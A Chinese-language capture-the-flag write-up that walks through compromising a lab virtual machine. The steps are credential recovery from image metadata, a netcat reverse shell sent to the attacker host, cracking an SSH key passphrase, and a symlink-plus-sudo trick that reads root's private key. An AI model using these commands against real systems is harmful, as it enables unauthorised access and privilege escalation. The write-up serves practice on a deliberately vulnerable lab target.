
前言
本次文章只用于技术讨论,学习,切勿用于非法用途,用于非法用途与本人无关!
信息收集阶段
KALI攻击机:192.168.1.128
靶机:192.168.1.119
目标:root.txt和user.txt
nmap -A -p1-65535 192.168.1.119
开启了22端口和80端口:
直接访问:白屏!
查看源代码!
看来白屏没啥问题!因为white.png!
看下上面的提示信息:
Only those that can see the invisible can do the imposible.
You have to be able to see what doesnt exist.
Only those that can see the invisible being able to see whats not there.
-alicia
直接翻译:
只有那些看得见看不见的人才能做不可能的事。
你必须能够看到不存在的东西。
只有那些能看到无形的人才能看到不存在的东西。
然后还有一个用户alicia!!
我猜测是否有信息隐藏在这张white.png的图片中,这也对应了上面说的话!
exiftool white.png
这下用户名和密码就都有了!
用户名:alicia
密码:ihaveadream
漏洞利用阶段
ssh连接下,但是我感觉没这么简单!
用户还挺多!
sudo -l走起!
这题有点简单啊!把bash送出去!
sudo -u emma /usr/bin/nc 192.168.1.128 4444 -e /bin/bash
修改为交互式的shell!
python3 -c 'import pty; pty.spawn("/bin/bash")'
我无法帮助我自己?!啥意思!我错了,应该不是很简单,感觉自己掉坑里了!
查一下!需要的flag在这!
看了大佬的wp,我完全时掉沟里了!这里需要用到一个gimp工具,其实和ps一样!然后gimp white.png,调节colors-curves曲线!
sophia的密码就出来了!哈哈哈哈哈哈!用PS也可以达到这个效果!
sophia/seemstobeimpossible,登录下看看!
第一个flag:
cat user.txt
hmvi***ver
权限提升阶段
接着就是提权root了!
我想偷个鸡!失败了!
还是常规套路吧,查看下这个文件!
sudo cat /home/isabella/.invisible
isabella账户的密钥!采用这个密钥连接isabella账户,不出所料,又有密码!
爆破下:./RSAcrack.sh -w rockyou.txt -k isabella_rsa
密码是:invisible
登陆下:
如果不是前面就掉坑了,这里肯定又上当了!
但思路并不是这样:
sophia的sudo权限包括cat和读取isabella的.invisible文件。所以,当我们以isabella账户登录时,我们创建一个.invisible文件与root的密钥文件的软链接,然后通过sophia账户来读取root的密钥。
rm .invisible
ln -s /root/.ssh/id_rsa .invisible
ls -al
sudo cat /home/isabella/.invisible 这次就是root的id_rsa了!
ssh -i rootidrsa root@192.168.1.119
最后的flag:
cat root.txt
hm**********ble
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)